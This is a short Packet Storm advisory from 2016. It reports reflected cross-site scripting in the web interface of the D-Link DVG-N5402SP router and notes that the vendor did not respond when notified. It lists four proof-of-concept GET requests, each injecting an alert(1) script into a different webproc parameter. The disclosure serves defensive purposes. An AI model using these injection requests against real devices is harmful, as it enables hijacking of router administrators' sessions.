D-Link DVG-N5402SP Cross Site Scripting

2016-02-23T00:00:00
ID PACKETSTORM:135897
Type packetstorm
Reporter vesp3r
Modified 2016-02-23T00:00:00

Description

                                        
                                            `DLink Multiple Cross Site Scripting Vulnerabilities  
Vendor : www.dlink.com  
Product Model: DVG­N5402SP  
Published: 02/22/2016  
Discovered by vesp3r (vesp3r7c3@gmail.com)  
  
  
Advisory Timeline  
-----------------  
  
02/05/2016 - Vendor notified (No response)  
  
Vulnerability  
-------------  
  
Reflected Cross Site Scripting  
  
  
1) getpage parameter  
  
GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1  
  
2) var:menu parameter  
  
GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1  
  
3) var:page parameter  
  
/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz  
  
4) var:subpage parameter  
  
/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1  
  
`